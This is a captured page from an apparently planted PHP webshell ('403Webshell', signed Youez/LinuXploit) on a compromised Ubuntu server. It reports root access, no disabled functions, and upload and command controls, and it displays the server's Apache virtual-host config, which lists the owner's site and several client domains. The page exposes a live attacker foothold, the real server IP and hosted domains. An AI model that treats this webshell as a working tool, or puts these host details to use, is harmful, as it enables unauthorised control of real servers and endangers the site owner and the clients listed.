403Webshell
Server IP : 159.69.118.108  /  Your IP : 216.73.216.200
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu-4gb-fsn1-1 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 13:53:54 UTC 2025 aarch64
User : root ( 0)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /etc/apache2/sites-available/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
	ServerName www.lauthiamkok.net
        ServerAlias lauthiamkok.net
        Redirect permanent / https://lauthiamkok.net/

	# The ServerName directive sets the request scheme, hostname and port that
	# the server uses to identify itself. This is used when creating
	# redirection URLs. In the context of virtual hosts, the ServerName
	# specifies what hostname must appear in the request's Host: header to
	# match this virtual host. For the default virtual host (this file) this
	# value is not decisive as it is used as a last resort host regardless.
	# However, you must set it for any further virtual host explicitly.
	#ServerName www.example.com

	ServerAdmin webmaster@localhost
#	DocumentRoot /var/www/html

	# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
	# error, crit, alert, emerg.
	# It is also possible to configure the loglevel for particular
	# modules, e.g.
	#LogLevel info ssl:warn

	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

	# For most configuration files from conf-available/, which are
	# enabled or disabled at a global level, it is possible to
	# include a line for only one particular virtual host. For example the
	# following line enables the CGI configuration for this host only
	# after it has been globally disabled with "a2disconf".
	#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

<VirtualHost *:4000>
      ServerAdmin webmaster@localhost
      DocumentRoot /var/www/html

      ErrorLog ${APACHE_LOG_DIR}/error.log
      CustomLog ${APACHE_LOG_DIR}/access.log combined

      ErrorDocument 404 /
</VirtualHost>

<VirtualHost *:8000>
      ServerAdmin webmaster@localhost
      DocumentRoot "/var/www/lauthiamkok.net/prototype.lauthiamkok.net"

      ErrorLog ${APACHE_LOG_DIR}/error.log
      CustomLog ${APACHE_LOG_DIR}/access.log combined

      ErrorDocument 404 /
</VirtualHost>

# Client projects:

<VirtualHost *:80>
        ServerName www.metriclife.net
        ServerAlias metriclife.net
        Redirect permanent / https://metriclife.net/
</VirtualHost>

<VirtualHost *:80>
         ServerName www.deborahrobinson.net
         ServerAlias deborahrobinson.net
         Redirect permanent / https://deborahrobinson.net/
</VirtualHost>

<VirtualHost *:80>
         ServerName www.mayflower-medical.co.uk
         ServerAlias mayflower-medical.co.uk
         Redirect permanent / https://mayflower-medical.co.uk/
</VirtualHost>

<VirtualHost *:80>
         ServerName www.travelscribe.org
         ServerAlias travelscribe.org
         Redirect permanent / https://travelscribe.org/
</VirtualHost>

<VirtualHost *:80>
        ServerName www.legacy.travelscribe.org
        ServerAlias legacy.travelscribe.org
        Redirect permanent / https://legacy.travelscribe.org/
</VirtualHost>

Youez - 2016 - github.com/yon3zu
LinuXploit